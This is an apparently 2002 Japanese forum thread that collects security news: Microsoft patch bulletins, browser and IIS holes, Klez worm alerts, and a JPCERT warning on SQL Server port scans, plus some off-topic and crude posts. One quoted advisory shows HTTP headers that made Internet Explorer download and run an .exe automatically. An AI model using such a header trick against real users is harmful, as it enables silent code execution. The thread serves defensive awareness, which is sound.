http://www.trendmicro.co.jp/virusinfo/basic/winsecurity/winsec1.asp
87 :
名無しさん@お腹いっぱい。 :02/03/30 11:48 ID:h73ib3uD
こんなにパッチ当ててると PCって○○してくるなぁと思ふ
4/1にI・Eに重大なセキュリティ・ホール発見のスレたてられても ウソだといえる自信が無いぞ
89 :
名無しさん@お腹いっぱい。 :02/03/31 03:14 ID:nHprOeGq
ちょっとまて、5.01SP2はwin98にパッチ出さないつもりか? おい、マイクソ! 貴様は世界最大手のOS屋なんだろ! さっさと全OS用のパッチおながいします。
90 :
名無しさん@お腹いっぱい。 :02/03/31 03:24 ID:GfAhBDK4
▼ N64ソフトについて TAKA 02/3/25(月) 18:34
分解したいなら買え (・∀・) 02/3/25(月) 21:31
掲示板での口調 エンドー 02/3/26(火) 1:06
Re:掲示板での口調 (・∀・) 02/3/26(火) 11:40
---------------------------------------------------
N64ソフトについて
TAKA - 02/3/25(月) 18:34 -
--------------------------------------------------
N64ソフトを分解したことがある人に聞きたいのですがあの
ネジをはずせるドライバーとはどのような物なのですか。詳しく
教えてください。
--------------------------------------------------
分解したいなら買え
(・∀・) - 02/3/25(月) 21:31 -
---------------------------------------------------
http://www.murauchi-hobby.com/cgi-bin/cargo.cgi?mode=search&frame=&Category=0&keyword=3911036 っていうかこれしかないだろ。
ちなみに、分解したら故障しても任天堂の保障は効きません。
--------------------------------------------------
掲示板での口調
エンドー - 02/3/26(火) 1:06 -
--------------------------------------------------
下のツリーにある「ゴルァ」もそうですけど、普通の口調で
書き込めないですか?せっかく6角ドライバの入手方法のレスを
付けてるのに、余計な悪印象を与えるのは勿体ないですよ。
---------------------------------------------------
Re:掲示板での口調
(・∀・) - 02/3/26(火) 11:40 -
----------------------------------------------------
そうですね。
91 :
◆MUMUMU4w :02/04/02 19:10 ID:iSWg5QiI
IEなどのXMLHTTPコントロールに関するセキュリティ問題の修正プログラムが公開
「MSXML」の各バージョン用の修正プログラムをダウンロード可能
(02/04/02)
マイクロソフト(株)は2日、IE 6などに搭載されている「Microsoft XML Core Services(MSXML)」
にセキュリティ上の脆弱性があり、ローカルファイルを読み取られる危険性があるとされる問題で、
この問題を修正するための修正プログラムを公開した。「MSXML」は、Windows XPや「Internet
Explorer」v6、「Microsoft SQL Server 2000」に同梱されているため、同社ではこれらの製品を
利用しているユーザーは直ちに修正プログラムを適用するよう推奨している。
この問題は、「MSXML」の“XMLHTTP”と呼ばれるコンポーネントが、「Internet Explorer」の
セキュリティゾーン設定に基づいた動作をしないために、悪意あるWebサイトを閲覧しただけで
ユーザーのローカルファイルを読み取られてしまう危険性があるというもの。
同社によると、「MSXML」はWindows XP、「Internet Explorer」v6、「Microsoft SQL Server 2000」
にあらかじめ同梱されているほか、市販のアプリケーションのセットアップ時に自動的に
インストールされることもあるとのこと。自分の環境に「MSXML」がインストールされているか
確認する最善の方法は、Widowsのシステムディレクトリに「MSXML」の関連ファイルがあるか
確認することだという。
具体的には“C:\Windows\system32\”または“C:\Winnt\system32\”に、“MSXML2.DLL”と
いうファイルがあれば「MSXML」v2.6が、“MSXML3.DLL”というファイルがあれば「MSXML」v3.0が、
“MSXML4.DLL”というファイルがあれば「MSXML」v4.0がインストールされていることになる。
修正プログラムは「MSXML」のバージョンごとに別々のファイルで公開されており、複数の
バージョンの「MSXML」がインストールされている場合は、それぞれ対応する修正プログラムを
適用しておく必要がある。
□XMLHTTP コントロールにより、ローカル ファイルにアクセスすることができる(MS02-008)
http://www.microsoft.com/japan/technet/security/bulletin/ms02-008.asp ソース:
http://www.forest.impress.co.jp/article/2002/04/02/xmlcoreservicepatch.html XML 2.x と 3.x のパッチが公開されました。(XML 4.x用のパッチは以前から公開)
私の環境(WinXP Pro)では、XML2/3/4 すべてのパッチを適用する必要がありました。
C:\WINNT\System32 (XP Home editionでは C:\WINDOWS\System32)で、
MSXML という名前でファイル名検索すると、どのパッチが必要かわかるようです。
92 :
◆MUMUMU4w :02/04/03 00:59 ID:ftHPmmpT
93 :
◆MUMUMU4w :02/04/05 13:53 ID:mFn43yZY
自動アップデートでMS02-17の修正がダウンロードされた、ページは まだ出来てないらしい。
95 :
名無しさん@お腹いっぱい。 :02/04/05 16:52 ID:pjwgBC81
96 :
◆MUMUMU4w :02/04/05 19:39 ID:mFn43yZY
97 :
◆MUMUMU4w :02/04/05 21:31 ID:mFn43yZY
■Slashdot Japanの記事
■ MS02-015パッチは機能していない?
k3c 曰く、 "マイクロソフトからMS02-015としてIEの累積的な修正プログラムがリリース
されましたが、情報筋によれば、このパッチを当てたあとでも脆弱性をついたexploitの
サンプルが機能するようです(The Register記事、jscript.dk及びBugTraqへの投稿)。
ワタシもexploitを試してみましたが、パッチ済みのマシンでもバッチリとファイルの中身を
表示されてしまいました。追試求む。"
ソース:
http://slashdot.jp/article.pl?sid=02/04/04/0343230
98 :
名無しさん@お腹いっぱい。 :02/04/05 21:51 ID:0fe7V3qN
阪神ワッショイ!! \\ 阪神ワッショイ!! // + + \\ 阪神ワッショイ!!/+ + + ⌒*⌒ ⌒*⌒ ⌒*⌒ ( ´∀`∩(´∀`∩)( ´∀`) + (( (つ ノ(つ 丿(つ つ + ヽ ( ノ ( ヽノ ) ) ) (_)し' し(_) (_)_)
99 :
◆MUMUMU4w :02/04/05 21:58 ID:mFn43yZY
■件名が日本語の『Fbound』ウイルスが猛威,対策ソフトへの過信は禁物―IPA
情報処理振興事業協会(IPA)セキュリティセンターは4月4日,2002年3月のコンピ
ューター・ウイルス届け出状況を公開した。ウイルスの発見届け出は1460件で,その
うち実際に被害に遭ったのは153件。同センターでは,届け出件数が急増している
「Fbound」ウイルスを特に警告するとともに,「対策ソフトを過信することなく,不用意な
添付ファイルは実行しない」ことを改めて呼びかけている。
ソース:
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020404/1/
100 :
100 :02/04/05 23:17 ID:QX+d3cNu
100
101 :
名無しさん@お腹いっぱい。 :02/04/06 00:15 ID:wklHbnOW
阪神連勝ワッショイ!! \\ 阪神連勝ワッショイ!! // + + \\ 阪神連勝ワッショイ!!/+ + . + /■\ /■\ /■\ + ( ´∀`∩(´∀`∩)( ´∀`) + (( (つ ノ(つ 丿(つ つ )) + ヽ ( ノ ( ヽノ ) ) ) (_)し' し(_) (_)_) ♪〜 負ける巨人に男の情け、負けてやりたい助〜けてみた〜い。そいつが 出来ない野球のつらさ〜 俺の俺の俺の心に無情の虎が〜(無情の虎が) 情け無用と吼えるのさ あっそれ 勝った勝った勝った勝った阪神阪神 タイガ〜ス ♪〜
102 :
名無しさん@お腹いっぱい。 :02/04/06 01:27 ID:9La8AZVx
2000のやついまgetした
103 :
(-_-) :02/04/06 02:15 ID:DKgCinsf
104 :
◆MUMUMU4w :02/04/07 16:38 ID:wPDr0Fp5
105 :
◆MUMUMU4w :02/04/12 16:25 ID:S5Fmh5hr
106 :
◆MUMUMU4w :02/04/12 16:43 ID:S5Fmh5hr
>>105 ■このパッチの記事(IT Pro)。10種類のセキュリティホール。
□□………………………………………………………………………………………………
□◆ IISに10種類のセキュリティ・ホール,
□ サーバー上で任意のプログラムを実行される
□□………………………………………………………………………………………………
マイクロソフトは4月10日,同社Webサーバー・ソフト「Internet Information Se
rver/Services(IIS)」に10種類の新しいセキュリティ・ホールがあることを明らか
にした。影響を受けるのは IIS 4.0/5.0/5.1。最も深刻なセキュリティ・ホールを悪
用されると,Webサーバー上で任意のプログラムを実行される恐れがある。すべての
ホールをふさぐパッチが公開されているので,管理者は早急に適用する必要がある。
ソース:
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020411/1/
108 :
名無しさん@お腹いっぱい。 :02/04/14 02:26 ID:5jXHiHa2
さすがディズニー(w Q310510 : 推奨修正プログラム ダウンロード サイズ: 223 KB, < 1 分 この修正プログラムによって、Windows XP に存在する 「白雪姫の DVD 再生時に、再生およびコピー防止の問題が発生する」問題 (サポート技術情報 JP310510) が修正されます。 今すぐダウンロードして、ディズニーの『白雪姫デラックス版 DVD』を 再生できるようにしてください。 詳細情報...
109 :
◆MUMUMU4w :02/04/16 14:00 ID:ZhqTijjO
■IEの「戻る」ボタンは危険
jbeef曰く、"15日深夜ごろBUGTRAQに流れた記事による と、IEの「戻る」ボタンを押すと、
cookieを盗まれたり、ロー カルファイルを盗まれたり、ローカルコマンドを起動された り
する危険があるとのこと。発見者のデモを試してみると、デモページの リンクを辿って
Googleサイトに飛び、そこで「戻る」ボタンを押した瞬 間、Googleサイト用のcookieが抜き
取られた。したがって、「怪しいサイト で変なリンクを辿ったら、戻ろうとせず、ウィンドウを
閉じた方がいい」と いうことになる。
ソース:
http://slashdot.jp/article.pl?sid=02/04/16/0239259&mode=thread
110 :
◆MUMUMU4w :02/04/16 14:07 ID:ZhqTijjO
■IISの最新パッチに一部問題、Site Serverユーザーは注意
マイクロソフトは4月12日,Internet Information Server/Services(IIS)の最新パッチを
適用すると,Webサイトへのログインが失敗する場合があることを明らかにした。影響を
受けるのは,OS が Windows 2000 で,かつ Site Server 3.0 をインストールしている場合。
同社が公開しているパッチを適用すれば,影響を回避できる。なお,Windows 2000 SRP1
を適用している場合にも,同様の問題が発生する。
ソース:
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020415/1/
111 :
名無しさん@お腹いっぱい。 :02/04/18 06:44 ID:LCt4or9f
こ、こんな良スレがあったとは。むむむ。
112 :
◆MUMUMU4w :02/04/18 14:23 ID:hID0Pq+h
■KLEZの新亜種に関する情報
*******************************************************************
感染警報VAC-2KLEZ新亜種「WORM_KLEZ.G」
世界規模で感染報告急増
*******************************************************************
トレンドマイクロ株式会社(本社:東京都渋谷区、代表取締役社長:
スティーブ・チャン)は、KLEZウイルスの新しい亜種「WORM_KLEZ.G」
(クレズ.G)について、国内および海外での感染被害報告の急増をうけ、
ウイルス警報VAC-2※1で警告します。弊社では既にパターンファイル
265※2以降で対応しています。また、専用駆除ツールの公開準備を
しています。
●現在の感染被害状況(2002年4月17日23時現在)
海外:台湾10件以上、ドイツ5件以上
国内:10件
●KLEZオリジナルおよびこれまでの亜種との違い
【ウイルスの作成ファイル】
ワームを実行した場合に、以下のファイルが作成されます。
<Windowsのシステムディレクトリ>¥WINK※.exe(「※」は無作為な文字列)
WINK※.exeはウイルス自身のコピーです。レジストリの値も変更されますので、
システム起動毎にワームが活動するようになります。
【ウイルス付e-mailの件名】
件名は、以下の候補文字列から1つまたはランダムに選択した文字列となり
ます。例えば、組み合わせによっては"Trendmicro removal tools"など弊社
などワクチンソフトメーカからのツールと思われるような件名になる場合が
あります。
件名の候補文字列については、下記URLをご参照ください。
http://www.trendmicro.co.jp/virusinfo/news2002/worm_klez_g.asp 【ウイルス付e-mailの差出人の詐称対象】
Windowsのアドレス帳およびローカルドライブ内の拡張子がMP8, EXE, SCR,
PIF, BAT, TXT, HTM, HTML. WAB, DOC, XLS, CPP, C, PAS, MPQ, MPEG,
BAK, MP3のファイルからランダムに選択したアドレスをウイルス付e-mailの
差出人(From:)にセットし、感染者が特定できないようにします。
ウイルスがもともと持っている差出人リストはありません。
■■■ WORM_KLEZ.Gの詳細については下記URL ■■■
■■■ またはFAXBOX情報提供サービスをご参照ください ■■■
【WORM_KLEZ.G詳細情報】
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.G 【ウイルス情報】
http://www.trendmicro.co.jp/virusinfo/index.asp
113 :
◆MUMUMU4w :02/04/18 14:26 ID:hID0Pq+h
114 :
◆MUMUMU4w :02/04/18 14:37 ID:hID0Pq+h
115 :
名無しさん@お腹いっぱい。 :02/04/18 21:15 ID:RztULd5c
116 :
名無しさん@お腹いっぱい。 :02/04/18 21:55 ID:Ag4V9hv9
>>115 漏れも今見て2chで出てるかなぁと思ってたらここにあった
もう、最低
operaもっとメジャーになってくれ、まだサポート甘いからな
とは逝ってもIEのセキュリティーホールの目白押しも痛すぎる
117 :
名無しさん@お腹いっぱい。 :02/04/18 23:14 ID:+H16FOk7
WindowsUpdateが日本語じゃなくなってるんですが 問題無いのかな
118 :
名無しさん@お腹いっぱい。 :02/04/18 23:18 ID:lJD9Zga/
>>117 私の環境からはは完璧に日本語でした。
Windows2000SP2
119 :
:02/04/18 23:25 ID:???
>>118 レスさんくす。俺だけみたいですね。
ちなみにOSはWin98です。
>>117 ツール→インターネットオプション→言語
で日本語以外になってない?
121 :
117 :02/04/18 23:35 ID:???
>>120 自力で気付いて直したら逝けました。
もうちょっと早く気付いて自己レスしたかった。恥ずかしい
でもさんくすでした。
122 :
◆MUMUMU4w :02/04/22 17:10 ID:04vWNvdj
■Klezワームの変種に機密を暴露する機能が存在か、対策企業が注意促す
Klezワームの最新の変種に,感染したマシン内の文書を添付して送信する機能があり,
機密文書の漏洩につながる恐れがあると,ウイルス対策企業が注意を促している。
(以上、2002年4月22日のZDNNより引用―全文はソースで)
ソース:
http://www.zdnet.co.jp/news/0204/22/e_klez.html (注)今後「全文転載してもよい」ということが明記されていないソースをの場合、
ソースからの一部引用、日付と引用先の明示、引用先リンクの表示にとどめる
こととします。(◆MUMUMU4w)
123 :
◆MUMUMU4w :02/04/23 23:43 ID:zyeZpiKE
ナマでパコパコやるな!!!! インターネット=ソープランドのマンコ パソコン=チンコ これでもナマでヤリますか? 淋、蔵まみれになりますか? ノートン買え!!!!!!!!!!! ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!! ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!! ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!! ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!! ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!! ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!! ソープランドを貶める意図はありません。 このくらい言わないと重大さが解らないか? ウイルス対策をしないのはチンコにゴムつけないのと同じです。 ソープランドで淋、蔵くらうことがあります。 別にスレがあります。
125 :
◆MUMUMU4w :02/04/24 22:54 ID:9wvHP3z1
126 :
名無しさん@お腹いっぱい。 :02/04/25 01:54 ID:Wo6x8/9O
セキュリティ総合と書いてあるのでここでお伺いしてよいのかなと思いました。 Targetっていうタイトルのメールが二通ばかしきたんですけど、本文も添付ファイルもなし。 削除したら、削除済みファイルにははいっていなくて、、これはウイルスメールなのですか?
128 :
◆MUMUMU4w :02/04/26 13:17 ID:+RoFI+Q3
■Outlook2000/2002(+Word)に新たなセキュリティホール
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-021ov.asp MS02-021 に関する情報
「MS02-021: 電子メール エディタの問題により、返信または転送でスクリプ
トが実行される(Q321804)」 に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
この問題は、Microsoft Outlook をご利用のお客様に影響があります。
電子メールの編集の際に Microsoft Word を使用するように設定している
お客様が、HTML メールを返信、または、転送する際にメールに含まれるスク
リプトが実行される可能性があります。最悪の場合、悪意のあるユーザーが
攻撃の対象となるシステムで、任意のスクリプトを実行することが可能になり
ます。
対象となる製品
==============
・ Microsoft Outlook 2000
・ Microsoft Outlook 2002
修正プログラム
==============
本問題は、Outlook をご利用いただいているお客様に影響がございますが、
この問題の原因は Microsoft Word 側にあります。 そのため、この問題を
修正するには、 Microsoft Word の修正プログラムをご適用ください。
Microsoft Outlook 用の修正プログラムは必要ありません。
・ Microsoft Word 2002
http://download.microsoft.com/download/Word2002/Patch/wrd1003/W982KMeXP/EN-US/wrd1003.exe ・ Microsoft Word 2000
http://download.microsoft.com/download/word2000/Patch/wrd0901/WIN98MeXP/EN-US/wrd0901.exe 本問題の修正に関しては、影響の受ける製品ではなく Microsoft Word の修正
により対応しております。
詳細
====
この問題を利用して、下記の攻撃が考えられます。
悪意のあるユーザーが、メールの受信者に任意のスクリプトを実行させること
が可能です。
この問題は、Outlook の 電子メールの編集に Microsoft Word を利用してい
る環境で、リッチテキスト、または、HTML 形式のメールを返信、または、
転送すると、Outlook が使用している Internet Explorer のセキュリティ
ゾーン の設定を無視してスクリプトが実行されます。
対策が行われていないシステムは、この問題を利用した悪影響を受けることが
あります。
この攻撃は、ハッカーまたはクラッカーと呼ばれる悪意のあるユーザーや、
ワームといった自動的な攻撃を目的とした悪意のあるプログラムから行われる
ことがあります。
日本語による詳細については、ただいま準備中です。
それまでの間、英語情報をご参照ください。
129 :
虹男 :02/04/27 02:51 ID:uq3DfzFW
困っております・・・。 YOU_ARE_FAT.MP3.scrってBadTransUってAVGが言いました。 BadTransBのことでしょうか?GENIO eを購入してActiveSyncを インストールして母艦と同期し始めたらMicrosoft LDAP Directory というのが出てきてなんのことだかわかりません。同期のときに AVGが発見してそのウイルスは処理しちゃいましたが。このLDAP とかいうものをちゃんと把握したいのですが調べてもわかりません。 ちゃんと把握して必要ならきちんと設定したいと考えています。 ここで聞くのはスレ違いなのかもしれませんがご指南願います。 LDAP Directoryのサーバー名・ユーザー名には”NULL”となってい ます。過去レスにこれはまずいと書かれていたのを見ました。 厨ですいません。よろしく願います。
131 :
虹男 :02/04/27 03:08 ID:uq3DfzFW
>>130 レスありがとうございます。Microsoft LDAPで検索するんですね。
しかし、どこをどう見ていいのか、アウトルック2002にどう
関連するのか、わからないですー・・・。よかったらもう一歩突っ
込んだところお願いします。よろしくですー。
すごい(・∀・)イイ! スレハッケソ ありがたいね。 こんなに、IEに穴があるとは・・・・
134 :
◆MUMUMU4w :02/05/01 12:13 ID:KAD+gXJn
■Netscape/Mozillaにローカルファイル読みとりの脆弱性
jbeef曰く、"4月30日にBUGTRAQに投稿された記事によると、 Netscape 6およびMozillaに
ローカルファイルの読み出しが可能なセキュリティホールがあるとのこと。この欠陥は、
MS02-008で修正されたIEのXMLHTTPの脆弱性のときと全く同じ方法で攻撃できてしまう
ものだとか。
(以上、2002年5月1日のSlashdot Japanより一部引用―全文は引用元を参照)
引用元:
http://slashdot.jp/article.pl?sid=02/05/01/0151233
135 :
名無しさん@お腹いっぱい。 :02/05/01 16:41 ID:iQTNTbsb
136 :
◆MUMUMU4w :02/05/04 18:18 ID:ohAzUimv
■FlashのActiveXプラグインに脆弱性
k3c曰く、 "BugTraqへの投稿によれば、Macromedia FlashのActiveXプラグインである
Flash.ocxのバージョン6.0r23以前にバッファオーバーフローの脆弱性があり、この脆弱性
を突いたコードを含んだHTMLをIEで表示させる (Outlook ExpressなどIEコンポーネントを
使った他のプログラムでもよい) ことで、FlashのActiveXプラグインを通してそのコードを
実行させることができるそうです。Macromediaからは既に対策済みのバージョン (6.0r29)
がダウンロードできます。
以前、Flashムービー形式のウイルスというのをタレコみましたが、これは感染にFlash
プレイヤーが必須だったのに対して、今度の脆弱性はIEのFlashプラグインがあれば
被害を受けます。
(以上、2002年5月4日のSlashdot Japanより一部引用―全文は引用元を参照)
引用元:
http://slashdot.jp/article.pl?sid=02/05/03/1752220
138 :
◆MUMUMU4w :02/05/06 00:57 ID:LUjrOWH7
>>137 どうも。確かに/.J発が最近多いかも。というか元はbugtraqか。
bugtraqは玉石混交で有用な情報を拾うのが結構面倒だったりするので、
拾ってくれる人がいるのは有難いかも。
139 :
:02/05/06 01:04 ID:???
140 :
名無しさん@お腹いっぱい。 :02/05/09 15:48 ID:fLRqhCyK
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-022ov.asp MS02-022 に関する情報
「MS02-022: MSN チャット コントロールの未チェックのバッファにより
コードが実行される(Q321661)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
この問題は、MSN チャットに含まれる未チェックのバッファにより、不正な
プログラムが実行される可能性がある問題です。最悪の場合、悪意のある
ユーザーがお客様のコンピューター上で任意のプログラムを実行することが
出来ます。
対象となる製品
==============
・ Microsoft MSN Chat (MSN チャット)
MSN チャットは、こちら <
http://chat.msn.co.jp/ > のサイトで公開され
ているチャットサービスをご利用いただく際にインストールする必要のある
Active X コントロールです。そのため、今までに MSN チャットをご利用
いただいたことのある全てのお客様が対象となります。
・ Microsoft MSN Messenger
MSN Messenger には、Microsoft MSN Chat (MSN チャット) が含まれて
います。そのため、MSN Messengerをご利用いただいている全てのお客様が
対象となります。
・ Microsoft Exchange Instant Messenger
Microsoft Exchange Instant Messenger 4.5 以降には、Microsoft MSN
Chat (MSN チャット) が含まれています。そのため、Microsoft Exchange
Instant Messenger ご利用いただいている全てのお客様が対象となります。
注意 : この問題の影響を受けるのは以下の組み合わせで上記製品が
インストールされている場合です。
・ Microsoft MSN Chat (MSN チャット) のみ
・ Microsoft MSN Messenger のみ
・ Microsoft Exchange Instant Messenger のみ
・ Microsoft MSN Chat (MSN チャット) と Microsoft Windows Messenger
(Windows XP に付属)
修正プログラム
==============
・ Microsoft MSN Chat (MSN チャット)
http://download.microsoft.com/download/chat/Patch/4.1/W98XP/EN-US/MSNChatSecFix.exe ご自身の環境で、MSN チャットや、MSN Messenger 等を利用しているかどうか
わからない場合には、念のため、修正プログラムを適用することをお勧めいた
します。
本修正プログラムは MSN チャットがインストールされている場合にのみ実行
されます。そのため、お客様の環境で MSN チャットがインストールされて
いない場合には、本修正プログラムによって影響を受けることはありません。
141 :
むむむ ◆MUMUMU4w :02/05/16 12:11 ID:rsZAKx7j
142 :
名無しさん@お腹いっぱい。 :02/05/16 17:03 ID:PGh0wTBh
143 :
名無しさん@お腹いっぱい。 :02/05/16 17:31 ID:qpGqZEre
144 :
むむむ ◆MUMUMU4w :02/05/16 22:03 ID:rsZAKx7j
>>141 の参考情報。
----------------------------------------------------------------------
SNS Advisory No.48
Microsoft Internet Explorer Still Download And Execute ANY Program Automatically
Problem first discovered: Wed, 13 Feb 2002
Published: Mon, 18 Mar 2002
Revised: Thu, 16 May 2002
----------------------------------------------------------------------
概要:
-----
Microsoft Internet Explorer には、さまざまな環境下においてユーザの
意思に関係なく、ファイルを自動的にダウンロードし、かつ、それを自動的
に実行してしまう問題があります。悪意ある Web サイトの管理者はこの問
題を利用することのできる悪意あるコンテンツを設置し、後述の環境に該当
するユーザが Internet Explorer を利用してこのコンテンツにアクセスし
た場合に、この管理者が指定した任意のプログラムはユーザのシステム上に
自動的にダウンロードされ、かつ、自動的に実行されてしまう可能性があり
ます。
詳細:
-----
Microsoft Internet Explorer には、さまざまな環境下において HTTP 応答
中に含まれる次のようなヘッダを含むコンテンツにアクセスした場合、ファ
イルを自動的にダウンロードし、かつ、それを自動的に実行してしまう問題
があります。
Content-Type: audio/x-ms-wma
Content-disposition: inline; filename="foo.exe"
ただしこれは一例であり、他の Content-Type: ヘッダ、例えば
Content-Type: audio/midi などの指定によっても可能であることを確認し
ております。
次に、我々が問題が発生しうると確認した環境は、以下のような環境です。
以前に公開した我々のアドバイザリでは、IE 6 のみがこの問題の影響を受
ける可能性があるとしましたが、その後の調査により、IE 5.01 SP2 もこの
問題の影響を受ける可能性があることを確認しました。
(以下略、全文は以下のURLを参照)
再配布について:
---------------
このアドバイザリの再配布は、下記条件を満たす限り自由です。
・発行元 URL として、以下の URL を明記する。
http://www.lac.co.jp/security/intelligence/SNSAdvisory/48.html
145 :
むむむ ◆MUMUMU4w :02/05/17 23:40 ID:7KeBdsJW
[セキュリティー]
----------------------------------------------------------------------------
09:「MicrosoftのIEパッチは不完全」セキュリティー専門家が指摘
----------------------------------------------------------------------------
http://sec.greymagic.com/news/ http://www.microsoft.com/windows/ie/downloads/critical/q321232/default.asp 米Microsoftは15日、Internet Explorer(IE)の6つの深刻な脆弱性を修正するた
めのパッチを公開したが、一部のセキュリティー専門家は、このパッチはこれらの脆
弱性による問題をすべて解消するわけではないと指摘している。
このパッチは、IE 5.01〜6と電子メール・クライアント「Outlook」に影響するク
ロスサイト・スクリプティングの脆弱性などのセキュリティーおよびプライバシー保
護上の不具合を修正するように設計されている。
だが、セキュリティー研究者のソア・ラーホルム氏とイスラエルのセキュリティー
会社GreyMagic Softwareは、同パッチのリリース後にセキュリティー・メーリング・
リスト「Bugtraq」にメッセージを投稿し、同パッチはクロスサイト・スクリプティ
ングの脆弱性については、影響するブラウザのうち1つのバージョンに関して問題を
修正するにすぎないと指摘している。
(以上、2002年5月17日配信のInternet Watchより引用)
146 :
名無しさん@お腹いっぱい。 :02/05/18 00:06 ID:pDdXB+p3
>>145 当てても意味のないパッチなのか・・・
ま、とりあえず当てとくか・・・
147 :
http://nara.cool.ne.jp/mituto :02/05/18 11:34 ID:iDqfA/st
148 :
むむむ ◆MUMUMU4w :02/05/21 10:55 ID:kTZFYWLe
# 若干旧聞ですが。
◆Operaにセキュリティ・ホール,Cookieやファイルを読み取られる恐れあり
Windows版 Opera のバージョン 5.12/6.0/6.01 に深刻なセキュリティ・ホールが
見つかっている。ある“細工”が施されたWebページを閲覧すると,ユーザーのCook
ieやファイル,閲覧したWebページの履歴情報などを読み取られる恐れがある。
続き(全文)は,
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020517/2/ でお読みいただけます。
(以上、IT Pro-Report 2002.05.20 メールより引用)
149 :
むむむ ◆MUMUMU4w :02/05/21 23:24 ID:sNoohwwZ
◆【今週のSecurity Check】IE 5.01/5.5 ユーザーは要注意,
パッチでは修正できないホールが存在
またもやInternet Explorer(IE)のセキュリティ・ホールが複数公開された。パ
ッチも公開されたものの,適用しても解消できないセキュリティ・ホールがIE 5.01
/5.5には存在する。「IE 6だけが影響を受ける」とされていたセキュリティ・ホール
の一つが,IE 5.01/5.5にも影響を与えることが,パッチ公開後に明らかになったか
らだ。「お勧め設定」を施せば回避可能だが,IE 5.01/5.5 ユーザーは十分注意が必
要だ。
続き(全文)は,
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20020521/1/ でお読みいただけます。
(以上、IT Pro-Report 2002.05.21 メールより引用)
150 :
1192 :02/05/22 00:27 ID:m9ltbDmb
151 :
名無しさん@お腹いっぱい。 :02/05/22 00:28 ID:wfXKzdof
>>149 読めないんですが。。。そのリンク先。。。
152 :
むむむ ◆MUMUMU4w :02/05/22 00:38 ID:FiGl53/h
>>151 会員登録(オンラインで可能: 無料)が必要ですね。
いちおう会員のみの情報なので、引用は控えます。
153 :
むむむ ◆MUMUMU4w :02/05/22 00:40 ID:FiGl53/h
Anonymous Coward曰く、"memo MLに02/05/21に投稿された記事によると、
各社のPCに搭載されているCyberSupportに脆弱性が発見された模様。現在、
少なくともSONY用、日立用、東芝用、NEC用の告知とパッチがジャストシステム
のサイト上にある。特にVAIOは、以前にあった『VAIOのプリインストール
プログラムに大穴』とは別の脆弱性なので、前回パッチを適用していても今回の
パッチを当てなければならない点に注意が必要だと思われる。"
(以上、2002年5月22日のSlashdot Japanより一部引用―全文は引用元を参照)
引用元:
http://slashdot.jp/article.pl?sid=02/05/21/0818228 使わなくても「搭載されている」ことが既に脆弱性なので注意が必要な模様。
154 :
むむむ ◆MUMUMU4w :02/05/23 11:15 ID:g+bP4XVM
今回のはSP3には含まれないのか・・・・
>>155 自己レス
>この修正を含む予定のサービス パック :
>
>この問題に対する修正プログラムは Windows 2000 Service Pack 3 に含まれる予定です。
含まれるてるね
157 :
むむむ ◆MUMUMU4w :02/05/24 16:14 ID:ffPAAdzl
TCP 1433番ポートへのスキャンの増加に関する注意喚起
Increase in TCP Port 1433 scanning activity
http://www.jpcert.or.jp/at/2002/at020002.txt I. 概要
JPCERT/CC では、TCP 1433番ポート (ms-sql-s) への大量のスキャンが広範
囲に渡って行なわれているとのインシデント報告を受け付けています。これら
のスキャンは、Microsoft SQL Server の既知の弱点を使って伝播するワーム
の感染の試みである可能性があります。
II. 対象
Microsoft SQL Server の管理用アカウント sa のパスワードが未設定であ
るシステムには、侵入やワームによる感染などの被害を受ける可能性がありま
す。また、Microsoft SQL Server をインストールしていなくても、製品の一
部として Microsoft SQL Server のコンポーネントが含まれている場合もある
ことにご注意ください。詳細は以下の URL で示したページをご参照ください。
SQL Server を標的とした SQLSPIDA ワームに関する情報
http://www.microsoft.com/japan/technet/security/virus/sqlspida.asp Microsoft SQL Server がインストールされているかどうかを調べる方法につ
いては、CERT/CC Vulnerability Note VU#635463 にも記述があります。
CERT/CC Vulnerability Note VU#635463
Microsoft SQL Server and Microsoft Data Engine (MSDE) ship with a null default password
http://www.kb.cert.org/vuls/id/635463 III. 予防と対策
Microsoft SQL Server への侵入を防ぐために、管理用アカウント sa に適
切なパスワードを設定してください。また、パケットフィルタリング機能など
を用いて、外部から内部の TCP 1433番ポート宛の不要なパケットを制限する
こともご検討ください。更に、ワームに感染してしまった場合の二次被害を防
ぐために、内部から外部の TCP 1433番ポート宛のパケットを制限することも
併せてご検討ください。
ワームに感染しているかどうかを調べる方法とワームに感染した場合の対応
策については、以下の URL で示したページをご参照ください。
(以上、JPCERT CCのアナウンス文より引用―全文は引用元を参照)
引用元:
http://www.jpcert.or.jp/at/2002/at020002.txt
158 :
名無しさん@お腹いっぱい。 :02/05/24 16:32 ID:QSGHzArQ
>>157 これ読んだ後すぐにFWのログをチェックしてみたら、すぐに見つかってビクーリしたよ。
つい一分ほど前にアクセスがあったみたい。
でも、ちゃんとブロックしてたので安心しますた。
159 :
むむむ ◆MUMUMU4w :02/05/25 03:19 ID:M5AhEbf6
160 :
むむむ ◆MUMUMU4w :02/05/28 13:12 ID:IHLq6X7D
161 :
むむむ ◆MUMUMU4w :02/05/28 13:16 ID:IHLq6X7D
162 :
名無し~3.EXE :02/05/28 16:45 ID:OGgGp826
163 :
むむむ ◆MUMUMU4w :02/05/28 18:13 ID:IHLq6X7D
■ExcelのXMLスタイルシート処理に問題点?
Microsoftの表計算ソフトExcelにセキュリティホールが報告されている。悪質な
ハッカーが特殊なXMLスタイルシートを使って侵入し、対象PCを乗っ取る恐れがある。
このセキュリティホールは、セキュリティ専門家のGeorgi Guninski氏が報告した
